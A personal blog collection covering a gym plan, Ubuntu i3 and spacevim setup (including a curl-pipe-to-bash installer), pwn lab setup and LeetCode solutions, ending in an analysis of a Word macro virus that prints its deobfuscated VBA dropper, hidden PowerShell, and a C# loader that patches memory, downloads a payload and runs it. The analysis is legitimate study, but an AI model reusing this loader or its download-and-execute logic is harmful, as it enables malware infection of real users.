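Training Plan, Version 2

After discussion and consultation, the members of TFA (TongS Fitness Association) unanimously decided that, because the previous fitness plan had some problems, a new fitness plan would be drawn up and adopted. The process was as follows.

Existing problems

  • Because the cycle is 5 days long, it always clashes with some classes or other commitments, which delays training
  • Arms can only be trained once per cycle (20 minutes), which is not enough volume
  • Chest and back are trained on gym equipment, but without a fixed standard it is easy to slack off, so the results are not great

Goals

  • At least 5 days of anaerobic training per cycle; the remaining two days can be anaerobic training or rest
  • Train for more than 35 minutes and less than 1 hour each day (beyond one hour, muscle breaks down)
  • Use one week as the cycle
  • Large muscle groups (chest, back, legs) rest at least 72 hours; small muscle groups (arms, waist and abs) rest at least 48 hours

Plan

Monday

Dumbbell arm blast

3D shoulder blast

Tuesday

Gym strength training · legs

Ab ripper, intensive

Wednesday

Home muscle-building special · armor chest

Full-body stretching

Thursday

Home muscle-building special · V-shaped back

Friday

Dumbbell arm blast

Ab sculpting, intensive

Saturday, Sunday

Badminton / swimming / boxing / running / rest: pick one

Problems with the new plan

  • I really want to do the bodyweight chest intensive (fancy push-ups), but the current schedule cannot fit it in; I will sort it out when the next plan is drawn up
  • The home muscle-building special needs its intensity adjusted by changing the dumbbell weight, adapting gradually
  • Measure the amount of nutritional intake

About us

TFA is TFA. The next new plan should be drawn up when a new plan should be drawn up. If this plan is reasonable, it should be possible to stick to it for a reasonable amount of time; if it is not reasonable, then this plan is certainly unreasonable.

I hope this plan gives me a better-looking physique, just like having finished this plan.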

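Ubuntu i3 installation notes

Keep the system up to date

sudo apt update && sudo apt upgrade

Then open Language Support and Additional Drivers to install Chinese language support and the necessary drivers.

Install i3

sudo apt install i3 i3lock-fancy lightdm lightdm-settings

Install related components

# nm-applet is shipped in the network-manager-gnome package
sudo apt install compton feh network-manager-gnome python3-pip blueman policykit-1-gnome volumeicon-alsa xfce4-power-manager vim-gtk3 proxychains4 scrot

sudo pip install autotiling dmenu

Optional components include spacevim; chromium is also quite nice to use.

Then remove the keyboard shortcuts of all other desktop managers.

scrot is used for screenshots; you can set up your own shortcut for it following the syntax of the configuration file below.

i3 configuration

This is a file adapted from the manjaro-i3 configuration file: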

# i3 config file (v4)
# Please see http://i3wm.org/docs/userguide.html for a complete reference!

# Set mod key (Mod1=<Alt>, Mod4=<Super>)
set $mod Mod4

# set default desktop layout (default is tiling)
# workspace_layout tabbed <stacking|tabbed>

# Configure border style <normal|1pixel|pixel xx|none|pixel>
default_border pixel 1
default_floating_border normal

# Hide borders
hide_edge_borders none

# change borders
bindsym $mod+u border none
bindsym $mod+y border pixel 1
bindsym $mod+n border normal

# Font for window titles. Will also be used by the bar unless a different font
# is used in the bar {} block below.
font xft:URWGothic-Book 11

# Use Mouse+$mod to drag floating windows
floating_modifier $mod

# start a terminal
bindsym $mod+Return exec gnome-terminal

# kill focused window
bindsym $mod+Shift+q kill

# start program launcher
bindsym $mod+d exec --no-startup-id dmenu_run

# launch categorized menu
bindsym $mod+z exec --no-startup-id morc_menu

################################################################################################
## sound-section - DO NOT EDIT if you wish to automatically upgrade Alsa -> Pulseaudio later! ##
################################################################################################

exec --no-startup-id volumeicon
bindsym $mod+Ctrl+m exec terminal -e 'alsamixer'
#exec --no-startup-id pulseaudio
#exec --no-startup-id pa-applet
#bindsym $mod+Ctrl+m exec pavucontrol

################################################################################################

# Screen brightness controls
# bindsym XF86MonBrightnessUp exec "xbacklight -inc 10; notify-send 'brightness up'"
# bindsym XF86MonBrightnessDown exec "xbacklight -dec 10; notify-send 'brightness down'"

# Start Applications
bindsym $mod+Ctrl+b exec terminal -e 'bmenu'
# bindsym $mod+F2 exec palemoon
# bindsym $mod+F3 exec pcmanfm
# bindsym $mod+F3 exec ranger
# bindsym $mod+Shift+F3 exec pcmanfm_pkexec
# bindsym $mod+F5 exec terminal -e 'mocp'
#bindsym $mod+t exec --no-startup-id pkill picom
#bindsym $mod+Ctrl+t exec --no-startup-id picom -b
bindsym $mod+Shift+d --release exec "killall dunst; exec notify-send 'restart dunst'"
bindsym Print exec --no-startup-id i3-scrot
bindsym $mod+Print --release exec --no-startup-id i3-scrot -w
bindsym $mod+Shift+Print --release exec --no-startup-id i3-scrot -s
bindsym $mod+Shift+h exec xdg-open /usr/share/doc/manjaro/i3_help.pdf
bindsym $mod+Ctrl+x --release exec --no-startup-id xkill

# focus_follows_mouse no

# change focus
bindsym $mod+j focus left
bindsym $mod+k focus down
bindsym $mod+l focus up
bindsym $mod+semicolon focus right

# alternatively, you can use the cursor keys:
bindsym $mod+Left focus left
bindsym $mod+Down focus down
bindsym $mod+Up focus up
bindsym $mod+Right focus right

# move focused window
bindsym $mod+Shift+j move left
bindsym $mod+Shift+k move down
bindsym $mod+Shift+l move up
bindsym $mod+Shift+semicolon move right

# alternatively, you can use the cursor keys:
bindsym $mod+Shift+Left move left
bindsym $mod+Shift+Down move down
bindsym $mod+Shift+Up move up
bindsym $mod+Shift+Right move right

# workspace back and forth (with/without active container)
workspace_auto_back_and_forth yes
bindsym $mod+b workspace back_and_forth
bindsym $mod+Shift+b move container to workspace back_and_forth; workspace back_and_forth

# split orientation
bindsym $mod+h split h;exec notify-send 'tile horizontally'
bindsym $mod+v split v;exec notify-send 'tile vertically'
bindsym $mod+q split toggle

# toggle fullscreen mode for the focused container
bindsym $mod+f fullscreen toggle

# change container layout (stacked, tabbed, toggle split)
bindsym $mod+s layout stacking
bindsym $mod+w layout tabbed
bindsym $mod+e layout toggle split

# toggle tiling / floating
bindsym $mod+Shift+space floating toggle

# change focus between tiling / floating windows
bindsym $mod+space focus mode_toggle

# toggle sticky
bindsym $mod+Shift+s sticky toggle

# focus the parent container
bindsym $mod+a focus parent

# move the currently focused window to the scratchpad
bindsym $mod+Shift+minus move scratchpad

# Show the next scratchpad window or hide the focused scratchpad window.
# If there are multiple scratchpad windows, this command cycles through them.
bindsym $mod+minus scratchpad show

#navigate workspaces next / previous
bindsym $mod+Ctrl+Right workspace next
bindsym $mod+Ctrl+Left workspace prev

# Workspace names
# to display names or symbols instead of plain workspace numbers you can use
# something like: set $ws1 1:mail
# set $ws2 2:
set $ws1 1
set $ws2 2
set $ws3 3
set $ws4 4
set $ws5 5
set $ws6 6
set $ws7 7
set $ws8 8

# switch to workspace
bindsym $mod+1 workspace $ws1
bindsym $mod+2 workspace $ws2
bindsym $mod+3 workspace $ws3
bindsym $mod+4 workspace $ws4
bindsym $mod+5 workspace $ws5
bindsym $mod+6 workspace $ws6
bindsym $mod+7 workspace $ws7
bindsym $mod+8 workspace $ws8

# Move focused container to workspace
bindsym $mod+Ctrl+1 move container to workspace $ws1
bindsym $mod+Ctrl+2 move container to workspace $ws2
bindsym $mod+Ctrl+3 move container to workspace $ws3
bindsym $mod+Ctrl+4 move container to workspace $ws4
bindsym $mod+Ctrl+5 move container to workspace $ws5
bindsym $mod+Ctrl+6 move container to workspace $ws6
bindsym $mod+Ctrl+7 move container to workspace $ws7
bindsym $mod+Ctrl+8 move container to workspace $ws8

# Move to workspace with focused container
bindsym $mod+Shift+1 move container to workspace $ws1; workspace $ws1
bindsym $mod+Shift+2 move container to workspace $ws2; workspace $ws2
bindsym $mod+Shift+3 move container to workspace $ws3; workspace $ws3
bindsym $mod+Shift+4 move container to workspace $ws4; workspace $ws4
bindsym $mod+Shift+5 move container to workspace $ws5; workspace $ws5
bindsym $mod+Shift+6 move container to workspace $ws6; workspace $ws6
bindsym $mod+Shift+7 move container to workspace $ws7; workspace $ws7
bindsym $mod+Shift+8 move container to workspace $ws8; workspace $ws8
# Moving workspaces between screens
bindsym $mod+p move workspace to output right

# Open applications on specific workspaces
# assign [class="Thunderbird"] $ws1
# assign [class="Pale moon"] $ws2
# assign [class="Pcmanfm"] $ws3
# assign [class="Skype"] $ws5

# Open specific applications in floating mode
for_window [title="alsamixer"] floating enable border pixel 1
for_window [class="calamares"] floating enable border normal
for_window [class="Clipgrab"] floating enable
for_window [title="File Transfer*"] floating enable
for_window [class="fpakman"] floating enable
for_window [class="Galculator"] floating enable border pixel 1
for_window [class="GParted"] floating enable border normal
for_window [title="i3_help"] floating enable sticky enable border normal
for_window [class="Lightdm-settings"] floating enable
for_window [class="Lxappearance"] floating enable sticky enable border normal
for_window [class="Manjaro-hello"] floating enable
for_window [class="Manjaro Settings Manager"] floating enable border normal
for_window [title="MuseScore: Play Panel"] floating enable
for_window [class="Nitrogen"] floating enable sticky enable border normal
for_window [class="Oblogout"] fullscreen enable
for_window [class="octopi"] floating enable
for_window [title="About Pale Moon"] floating enable
for_window [class="Pamac-manager"] floating enable
for_window [class="Pavucontrol"] floating enable
for_window [class="qt5ct"] floating enable sticky enable border normal
for_window [class="Qtconfig-qt4"] floating enable sticky enable border normal
for_window [class="Simple-scan"] floating enable border normal
for_window [class="(?i)System-config-printer.py"] floating enable border normal
for_window [class="Skype"] floating enable border normal
for_window [class="Timeset-gui"] floating enable border normal
for_window [class="(?i)virtualbox"] floating enable border normal
for_window [class="Xfburn"] floating enable

# switch to workspace with urgent window automatically
for_window [urgent=latest] focus

# reload the configuration file
bindsym $mod+Shift+c reload

# restart i3 inplace (preserves your layout/session, can be used to upgrade i3)
bindsym $mod+Shift+r restart

# exit i3 (logs you out of your X session)
bindsym $mod+Shift+e exec "i3-nagbar -t warning -m 'You pressed the exit shortcut. Do you really want to exit i3? This will end your X session.' -b 'Yes, exit i3' 'i3-msg exit'"

# Set shut down, restart and locking features
bindsym $mod+0 mode "$mode_system"
set $mode_system (l)ock, (e)xit, switch_(u)ser, (s)uspend, (h)ibernate, (r)eboot, (Shift+s)hutdown
mode "$mode_system" {
bindsym l exec --no-startup-id i3lock-fancy, mode "default"
bindsym s exec --no-startup-id suspend, mode "default"
bindsym u exec --no-startup-id i3exit switch_user, mode "default"
bindsym e exec --no-startup-id i3exit logout, mode "default"
bindsym h exec --no-startup-id i3exit hibernate, mode "default"
bindsym r exec --no-startup-id reboot, mode "default"
bindsym Shift+s exec --no-startup-id shutdown now, mode "default"

# exit system mode: "Enter" or "Escape"
bindsym Return mode "default"
bindsym Escape mode "default"
}

# Resize window (you can also use the mouse for that)
bindsym $mod+r mode "resize"
mode "resize" {
# These bindings trigger as soon as you enter the resize mode
# Pressing left will shrink the window’s width.
# Pressing right will grow the window’s width.
# Pressing up will shrink the window’s height.
# Pressing down will grow the window’s height.
bindsym j resize shrink width 5 px or 5 ppt
bindsym k resize grow height 5 px or 5 ppt
bindsym l resize shrink height 5 px or 5 ppt
bindsym semicolon resize grow width 5 px or 5 ppt

# same bindings, but for the arrow keys
bindsym Left resize shrink width 10 px or 10 ppt
bindsym Down resize grow height 10 px or 10 ppt
bindsym Up resize shrink height 10 px or 10 ppt
bindsym Right resize grow width 10 px or 10 ppt

# exit resize mode: Enter or Escape
bindsym Return mode "default"
bindsym Escape mode "default"
}

# Lock screen
bindsym $mod+9 exec --no-startup-id i3lock-fancy

##########################################
# Autostart applications #################
##########################################
# exec --no-startup-id /usr/lib/polkit-gnome/polkit-gnome-authentication-agent-1
# exec --no-startup-id nitrogen --restore; sleep 1; picom -b
# exec --no-startup-id manjaro-hello
exec_always --no-startup-id compton
exec --no-startup-id feh --bg-fill ~/Pictures/Wallpapers/wallpaper1.png
exec --no-startup-id nm-applet
exec --no-startup-id xfce4-power-manager
# exec --no-startup-id pamac-tray
# exec --no-startup-id clipit
exec_always --no-startup-id autotiling
exec --no-startup-id fcitx
exec --no-startup-id blueman-applet
# exec_always --no-startup-id sbxkb
# exec --no-startup-id start_conky_maia
# exec --no-startup-id start_conky_green
exec --no-startup-id xautolock -time 30 -locker i3lock-fancy
exec --no-startup-id /usr/lib/policykit-1-gnome/polkit-gnome-authentication-agent-1 &
# exec_always --no-startup-id ff-theme-util
# exec_always --no-startup-id fix_xcursor
# exec --no-startup-id ss-qt5

############################################################

# Color palette used for the terminal ( ~/.Xresources file )
# Colors are gathered based on the documentation:
# https://i3wm.org/docs/userguide.html#xresources
# Change the variable name at the place you want to match the color
# of your terminal like this:
# [example]
# If you want your bar to have the same background color as your
# terminal background change the line 362 from:
# background #14191D
# to:
# background $term_background
# Same logic applied to everything else.
set_from_resource $term_background background
set_from_resource $term_foreground foreground
set_from_resource $term_color0 color0
set_from_resource $term_color1 color1
set_from_resource $term_color2 color2
set_from_resource $term_color3 color3
set_from_resource $term_color4 color4
set_from_resource $term_color5 color5
set_from_resource $term_color6 color6
set_from_resource $term_color7 color7
set_from_resource $term_color8 color8
set_from_resource $term_color9 color9
set_from_resource $term_color10 color10
set_from_resource $term_color11 color11
set_from_resource $term_color12 color12
set_from_resource $term_color13 color13
set_from_resource $term_color14 color14
set_from_resource $term_color15 color15

# Start i3bar to display a workspace bar (plus the system information i3status if available)
bar {
i3bar_command i3bar -t
status_command i3status
position top

## please set your primary output first. Example: 'xrandr --output eDP1 --primary'
# tray_output primary
# tray_output eDP1

bindsym button4 nop
bindsym button5 nop
# font xft:URWGothic-Book 11
strip_workspace_numbers yes
status_command exec ~/.config/i3/net-speed.sh

colors {
background #00000060
statusline #ffffff
separator #00000060

# border backgr. text
focused_workspace #00000060 #00000060 #009900
active_workspace #595B5B #353836 #008800
inactive_workspace #595B5B #222D31 #EEE8D5
binding_mode #16a085 #2C2C2C #F9FAF9
urgent_workspace #16a085 #FDF6E3 #E5201D
}
}

# hide/unhide i3status bar
bindsym $mod+m bar mode toggle

# Theme colors
# class border backgr. text indic. child_border
client.focused #556064 #556064 #80FFF9 #FDF6E3
client.focused_inactive #2F3D44 #2F3D44 #1ABC9C #454948
client.unfocused #2F3D44 #2F3D44 #1ABC9C #454948
client.urgent #CB4B16 #FDF6E3 #1ABC9C #268BD2
client.placeholder #000000 #0c0c0c #ffffff #000000

client.background #2B2C2B

#############################
### settings for i3-gaps: ###
#############################

# Set inner/outer gaps
#gaps inner 14
#gaps outer -2
#
## Additionally, you can issue commands with the following syntax. This is useful to bind keys to changing the gap size.
## gaps inner|outer current|all set|plus|minus <px>
## gaps inner all set 10
## gaps outer all plus 5
#
## Smart gaps (gaps used if only more than one container on the workspace)
#smart_gaps on
#
## Smart borders (draw borders around container only if it is not the only container on this workspace)
## on|no_gaps (on=always activate and no_gaps=only activate if the gap size to the edge of the screen is 0)
#smart_borders on
#
## Press $mod+Shift+g to enter the gap mode. Choose o or i for modifying outer/inner gaps. Press one of + / - (in-/decrement for current workspace) or 0 (remove gaps for current workspace). If you also press Shift with these keys, the change will be global for all workspaces.
#set $mode_gaps Gaps: (o) outer, (i) inner
#set $mode_gaps_outer Outer Gaps: +|-|0 (local), Shift + +|-|0 (global)
#set $mode_gaps_inner Inner Gaps: +|-|0 (local), Shift + +|-|0 (global)
#bindsym $mod+Shift+g mode "$mode_gaps"
#
#mode "$mode_gaps" {
# bindsym o mode "$mode_gaps_outer"
# bindsym i mode "$mode_gaps_inner"
# bindsym Return mode "default"
# bindsym Escape mode "default"
#}
#mode "$mode_gaps_inner" {
# bindsym plus gaps inner current plus 5
# bindsym minus gaps inner current minus 5
# bindsym 0 gaps inner current set 0
#
# bindsym Shift+plus gaps inner all plus 5
# bindsym Shift+minus gaps inner all minus 5
# bindsym Shift+0 gaps inner all set 0
#
# bindsym Return mode "default"
# bindsym Escape mode "default"
#}
#mode "$mode_gaps_outer" {
# bindsym plus gaps outer current plus 5
# bindsym minus gaps outer current minus 5
# bindsym 0 gaps outer current set 0
#
# bindsym Shift+plus gaps outer all plus 5
# bindsym Shift+minus gaps outer all minus 5
# bindsym Shift+0 gaps outer all set 0
#
# bindsym Return mode "default"
# bindsym Escape mode "default"
#}

Appendix: installing spacevim

Install

curl -sLf https://spacevim.org/cn/install.sh | bash -s -- -i vim

Configuration file

#=============================================================================
# dark_powered.toml --- dark powered configuration example for SpaceVim
# Copyright (c) 2016-2020 Wang Shidong & Contributors
# Author: Wang Shidong < wsdjeg at 163.com >
# URL: https://spacevim.org
# License: GPLv3
#=============================================================================

# All SpaceVim option below [option] section
[options]
# set spacevim theme. by default colorscheme layer is not loaded,
# if you want to use more colorscheme, please load the colorscheme
# layer
colorscheme = "gruvbox"
colorscheme_bg = "dark"
# Disable guicolors in basic mode, many terminal do not support 24bit
# true colors
enable_guicolors = true
# Disable statusline separator, if you want to use other value, please
# install nerd fonts
statusline_separator = "arrow"
statusline_iseparator = "arrow"
buffer_index_type = 4
enable_tabline_filetype_icon = true
enable_statusline_mode = false

# Enable autocomplete layer
[[layers]]
name = 'autocomplete'
auto_completion_return_key_behavior = "complete"
auto_completion_tab_key_behavior = "smart"

[[layers]]
name = 'shell'
default_position = 'top'
default_height = 30
[[layers]]
name="lang#python"
[[layers]]
name = "debug"


[[layers]]
name="lang#c"
enable_clang_syntax_highlight = true

[[layers]]
name = "lsp"
filetypes = [
"c",
"cpp"
]
[layers.override_cmd]
c = ["clangd"]
[[layers]]
name="format"

[[layers]]
name="lang#rust"
[[layers]]
name = "lsp"
filetypes = [
"rust"
]
[layers.override_cmd]
rust = ["rls"]

[[layers]]
name="lang#markdown"
[[layers]]
name="lang#latex"

[[layers]]
name = "colorscheme"

[options]
name = "colorscheme"
colorscheme_bg = "transparent"

Appendix: downloading software commonly used in China

wget https://dldir1.qq.com/music/clntupate/linux/deb/qqmusic_1.1.0_amd64.deb
wget https://ime.sogouimecdn.com/202107161153/d2a8c3524aec02466092d41d25cb4e72/dl/index/1612260778/sogoupinyin_2.4.0.3469_amd64.deb
wget https://wdl1.cache.wps.cn/wps/download/ep/Linux2019/10161/wps-office_11.1.0.10161_amd64.deb
wget https://issuecdn.baidupcs.com/issue/netdisk/LinuxGuanjia/3.5.0/baidunetdisk_3.5.0_amd64.deb
wget https://d1.music.126.net/dmusic/netease-cloud-music_1.2.1_amd64_ubuntu_20190428.deb
# quoted so the shell does not interpret & and $ in the query string; -O keeps a .deb file name
wget -O linuxqq_2.0.0-b2-1089_amd64.deb 'https://ac8e24a1e1c7815d5d015ed5e013f532.dlied1.cdntips.net/dlied1.qq.com/qqweb/LinuxQQ/linuxqq_2.0.0-b2-1089_amd64.deb?mkey=60f12f1bb7c5a6f2&f=8951&cip=183.197.128.7&proto=https&access_type=$header_ApolloNet'
wget https://az764295.vo.msecnd.net/stable/c3f126316369cd610563c75b1b1725e0679adfb3/code_1.58.2-1626302803_amd64.deb

Then install them

sudo dpkg -i *.deb || sudo apt install --fix-broken

Environment variables for the Sogou input method: edit /etc/profile and append the following at the end

export GTK_IM_MODULE=fcitx
export QT_IM_MODULE=fcitx
export XMODIFIERS=\@im=fcitx

Uninstall unnecessary software

sudo apt autoremove gnome gnome-shell gnome-control-center

Configure i3status

Edit /etc/i3status.conf

# i3status configuration file.
# see "man i3status" for documentation.

# It is important that this file is edited as UTF-8.
# The following line should contain a sharp s:
# ß
# If the above line is not correctly displayed, fix your editor first!

general {
colors = true
interval = 5
}

# order += "ipv6"
#order += "wireless _first_"
#order += "ethernet _first_"
#order += "battery all"
order += "disk /"
order += "load"
order += "memory"
order += "tztime local"

#wireless _first_ {
# format_up = "W: (%quality at %essid) %ip"
# format_down = "W: down"
#}
#
#ethernet _first_ {
# format_up = "E: %ip (%speed)"
# format_down = "E: down"
#}

#battery all {
# format = "%status %percentage %remaining"
#}

disk "/" {
format = "disk: %avail"
}

load {
format = "cpu: %1min"
}

memory {
format = "%used/ %total"
threshold_degraded = "1G"
format_degraded = "MEMORY < %available"
}

tztime local {
format = "%Y-%m-%d %H:%M:%S"
}

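Daily paper reading: nlp-1

The Design and Implementation of XiaoIce, an Empathetic Social Chatbot

Original paper: https://www.aclweb.org/anthology/2020.cl-1.2.pdf

XiaoIce's design has three key points

  1. IQ: the way the various skills are driven; XiaoIce has 230 skills in total
  2. EQ: first it needs the skill of understanding the user's emotions, then it has to decide the text, tone and content of its response based on the user's own personal characteristics, and start a new topic when the conversation stalls
  3. Optimization: CPS (the number of turns per conversation) is used for optimization, but it is not the only metric.

XiaoIce uses a hierarchical decision model to conduct conversations

The top-level Markov model decides which dialogue model XiaoIce uses, and then the lower-level decision is made

Learning pwn: setting up the environment

System

ubuntu16.04 or ubuntu18.04; both are available in the ubuntu-releases directory of a mirror site

glibc

From the Links->Resources page of buuoj you can download every glibc version from 2.23 to 2.31

python

The pip environment may throw errors; you can try downloading it from the bootstrap site

curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py

If the version does not match, it prints the link for the matching version

glibc source code

https://packages.ubuntu.com/xenial/glibc-source

Debugging

sudo apt install gdb gdbserver gdb-multiarch qemu qemu-kvm

Install pwndbg https://github.com/pwndbg/pwndbg

git clone https://github.com/pwndbg/pwndbg
cd pwndbg
./setup.sh

After downloading the glibc source, extract it, then set the source search path in gdb; for convenience you can also add this line to .gdbinit

dir path_to_glibc

Development

vscode with the jupyter, python and c/c++ extensions

Daily malware analysis and leetcode-4

leetcode 363: Max Sum of Rectangle No Larger Than K

(I went straight to the published solution.) Enumerate the rows first, then the columns; with a library function the value not exceeding k can be found in O(nlogn) time. In C I simply brute-forced the columns.

#include <stdint.h>
#include <string.h>

int maxSumSubmatrix(int** matrix, int matrixSize, int* matrixColSize, int k){
    int xlen=matrixSize;
    int ans=INT32_MAX; // smallest k-ss seen so far, over all sums ss<=k
    if(!xlen)return 0;
    int ylen=matrixColSize[0];
    if(!ylen)return 0;
    int sum[40000]; // sum[c]: column c summed over rows i..j
    int ss=0;
    // printf("ok\n");
    for(int i=0;i<xlen;i++){ // top row
        memset(sum,0,ylen*sizeof(int));
        for(int j=i;j<xlen;j++){ // bottom row
            for(int c=0;c<ylen;c++){
                sum[c]+=matrix[j][c];
                // printf("%d %d %d %d\n",i,j,c,sum[c]);
            }
            for(int c=0;c<ylen;c++){ // left column
                ss=0;
                for(int cc=c;cc<ylen;cc++){ // right column
                    ss+=sum[cc];
                    // printf("%d\n",ss);
                    if(k>=ss&&k-ss<ans){
                        ans=k-ss;
                    }
                }
            }
        }
    }
    return k-ans;
}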

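368: Largest Divisible Subset

For a sorted input array, dp[i] is the size of the largest divisible sequence that the i-th number can form with the numbers before it. Divisibility has this property: if s|d and d|c, then s|c. In other words, if arr[j] forms a divisible sequence with earlier numbers and arr[j]|arr[i], then arr[i] forms a divisible sequence with every number in arr[j]'s sequence. That makes this a dynamic programming problem.

dp[i] is initialized to 1

dp[i]=nums[i]%nums[j]==0&&dp[j]>=dp[i]?dp[j]+1:dp[i];

To record the sequence that makes up the largest subset, a last array is also needed to store the predecessor of i

To get sorted input, I also had to review quicksort = =

#include <stdlib.h>

// Partition arr[start..end] around the pivot arr[start]; returns the pivot's final index
int qSort(int *arr,int start,int end){
    int j=end,i=start+1;
    int t;
    while(i<j+1&&arr[i]<=arr[start])i++;
    for(;j>i;j--){
        if(arr[j]<=arr[start]){
            t=arr[i];
            arr[i]=arr[j];
            arr[j]=t;
            while(i<j&&arr[i]<=arr[start])i++;
        }
    }
    t=arr[i-1];
    arr[i-1]=arr[start];
    arr[start]=t;
    return i-1;
}
void quickSort(int *arr,int start,int end){
    if(start>=end)return;
    int mid=qSort(arr,start,end);
    // printf("%d %d %d\n",start,end,mid);
    quickSort(arr,start,mid-1); // the pivot at mid is already in place; excluding it also guarantees termination on equal values
    quickSort(arr,mid+1,end);
}
int* largestDivisibleSubset(int* nums, int numsSize, int* returnSize){
    int dp[40000]; // dp[i]: size of the largest divisible subset ending at nums[i]
    int last[40000]; // last[i]: index of the previous element of that subset
    int maxind=0;
    dp[0]=1;
    last[0]=0; // initialized so the back-tracking loop never reads an indeterminate value
    quickSort(nums,0,numsSize-1);
    for(int i=1;i<numsSize;i++){
        int maxi=i;
        dp[i]=1;
        last[i]=i;
        for(int j=0;j<i;j++){
            if(nums[i]%nums[j]==0&&dp[j]>=dp[maxi]){
                maxi=j;
                dp[i]=dp[j]+1;
                last[i]=j;
                if(dp[maxind]<dp[i]){
                    maxind=i;
                }
            }
        }
    }
    *returnSize=dp[maxind];
    int *res=(int*)malloc(sizeof(int)*dp[maxind]);
    // walk the last[] chain backwards to fill the result
    for(int i=dp[maxind]-1;i>=0;i--){
        res[i]=nums[maxind];
        maxind=last[maxind];
    }
    return res;
}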

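In the end the runtime beat 96% of submissions; memory use was fairly high, probably because of the two 40000-element arrays, hhhh. After switching to malloc the memory did indeed come down; the remaining memory use is probably the quicksort recursion and the last array.

Analysis of a Word macro virus sample

https://www.52pojie.cn/thread-1287476-1-1.html

This is my first analysis, so I am going through the steps in detail (the VM has been disconnected from the network)

Debugging the macro virus

  1. Hold down the Shift key
  2. Click to enable macros
  3. Release Shift
  4. Press Alt+F11 to open the macro debugger
  5. Debug the macro

Sub Document_Open() below is the entry point

The code is obfuscated; after copying it and formatting it with automateexcel.com/vba-code-indenter, we get the following program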

Option Explicit

Private Sub SnottineSS(ByVal a1 As Variant, ByVal a2 As Variant, ByVal a3 As Variant, ByVal a4 As Long)

a1.Create Lethbridge(ActiveDocument.Variables("l26cd3c2c2f351").Value), a2, a3, a4

End Sub
Sub Document_Open()

Dim Garniture As Object: Set Garniture = GetObject(Lethbridge(ActiveDocument.Variables("de9a2c49a42b6").Value))
SnottineSS Garniture, Null, Null, 0

End Sub
Private Function Lethbridge(ByVal Garniture As String) As String

Dim Hulkier As Long: Dim Humoursome() As Byte

GoTo NoNapparitioNal

Dickinson:

For Hulkier = 0 To UBound(Humoursome)

Humoursome(Hulkier) = Abs(Humoursome(Hulkier) - 14)
Next

GoTo SnottineSS
Exit Function

Slinky:

MsgBox " Above steps are still valid."

Exit Function
NoNapparitioNal:

Humoursome = StrConv(Garniture, 256 / 2, 1000 + 55)
GoTo Dickinson

Exit Function
SnottineSS:

Lethbridge = StrConv(Humoursome, 32 * 2, 1000 + 55)

Exit Function

GoTo Crossville

Crossville:

MsgBox " this solution will provide modules"
Exit Function
End Function

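Set a breakpoint on Sub Document_Open(); after clicking Run, execution enters the debug state

Press F8 to step into Lethbridge

Then open View -> Locals Window to watch the variables and keep single-stepping; whenever a loop is hit, use Run to Cursor. Continue until just before Exit Function, where the decrypted string “winmgmts:\\.\root\cimv2:Win32_Process” can be observed

Looking up the Win32_Process object (https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-tasks--processes) shows that it is mainly used to create processes and to query process information

This string is then passed to GetObject, and the result is passed to the SnottineSS function

Then another string is decrypted; running it yields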

"powershell -WindowStyle Hidden 
function y171e {param($z4627)$k58be9='a57157c';$yce74a='';for ($i=0; $i -lt $z4627.length;$i+=2){$vc2775=[convert]::ToByte($z4627.Substring($i,2),16);$yce74a+=[char]($vc2775 -bxor $k58be9[($i/2)%$k58be9.length]);}return "

Formatted:

# powershell -WindowStyle Hidden 
function y171e {
param($z4627)$k58be9 = 'a57157c';
$yce74a = '';
for ($i = 0; $i -lt $z4627.length; $i += 2) {
$vc2775 = [convert]::ToByte($z4627.Substring($i, 2), 16);
$yce74a += [char]($vc2775 -bxor $k58be9[($i / 2) % $k58be9.length]);
}
return
}

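The first command runs a ps1 script

TODO: I did not manage to reach the real powershell script in the debugger here?

So I use the one from the article directly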

powershell  Hidden 
function y171e {param($z4627)$k58be9='a57157c';$yce74a='';for ($i=0; $i -lt $z4627.length;$i+=2){$vc2775=[convert]::ToByte($z4627.Substring($i,2),16);$yce74a+=[char]($vc2775 -bxor $k58be9[($i/2)%$k58be9.length]);}return $yce74a;}
$z24c573 = '<hex-encoded string not preserved on this page>';
$z24c5732 = y171e($z24c573);
Add-Type -TypeDefinition $z24c5732;
[yba2983]::c193b();

Once $z24c5732 has been assigned, simply echo $z24c5732 to get the C# code below

using System;using System.Runtime.InteropServices;using System.Diagnostics;using System.IO;using System.Net;
public class yba2983{[DllImport("kernel32",EntryPoint="GetProcAddress")]public static extern IntPtr v779b(IntPtr x8d356,string v7be73);[DllImport("kernel32",EntryPoint="LoadLibrary")]public static extern IntPtr e6656d9(string zc6ea);[DllImport("kernel32",EntryPoint="VirtualProtect")]public static extern bool h7c586(IntPtr mda7864,UIntPtr k27bc1b,uint xcdaf29,out uint r84b39);[DllImport("Kernel32.dll",EntryPoint="RtlMoveMemory",SetLastError=false)]static extern void ef5ae(IntPtr a948e8,IntPtr l8b12e,int g4c6e);public static int c193b(){IntPtr c2ae2d6=e6656d9(y171e("005844581b530f0d"));if(c2ae2d6!=IntPtr.Zero){IntPtr r963493=v779b(c2ae2d6,y171e("205844586654020f774257535211"));if(r963493!=IntPtr.Zero){UIntPtr hbaa2d=(UIntPtr)5;uint k9c379=0;if(h7c586(r963493,hbaa2d,0x40,out k9c379)){Byte[] je1ed={0x31,0xff,0x90};IntPtr nb327a=Marshal.AllocHGlobal(3);Marshal.Copy(je1ed,0,nb327a,3);ef5ae(new IntPtr(r963493.ToInt64()+0x001b),nb327a,3);}}}string s183fa=Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\c9255" + y171e("4f504f54");new WebClient().DownloadFile(y171e("09414341460d4c4e56565f5b5601084647435a470613414e534758080447441f56580e4e4558411a0f2c16627c437366530664587a410e4d044d52"),s183fa);ProcessStartInfo y6cb2=new ProcessStartInfo(s183fa);Process.Start(y6cb2);return 0;}public static string y171e(string me8994){string x8d356="a57157c";string e6656d9="";for(int i=0; i<me8994.Length;i+=2){byte v779b=Convert.ToByte(me8994.Substring(i,2),16);e6656d9+=(char)(v779b^x8d356[(i/2)%x8d356.Length]);}return e6656d9;}}

After formatting

using System;
using System.Runtime.InteropServices;
using System.Diagnostics;
using System.IO;
using System.Net;
public class yba2983
{
[DllImport("kernel32",EntryPoint="GetProcAddress")]public static extern IntPtr v779b(IntPtr x8d356,string v7be73);
[DllImport("kernel32",EntryPoint="LoadLibrary")]public static extern IntPtr e6656d9(string zc6ea);
[DllImport("kernel32",EntryPoint="VirtualProtect")]public static extern bool h7c586(IntPtr mda7864,UIntPtr k27bc1b,uint xcdaf29,out uint r84b39);
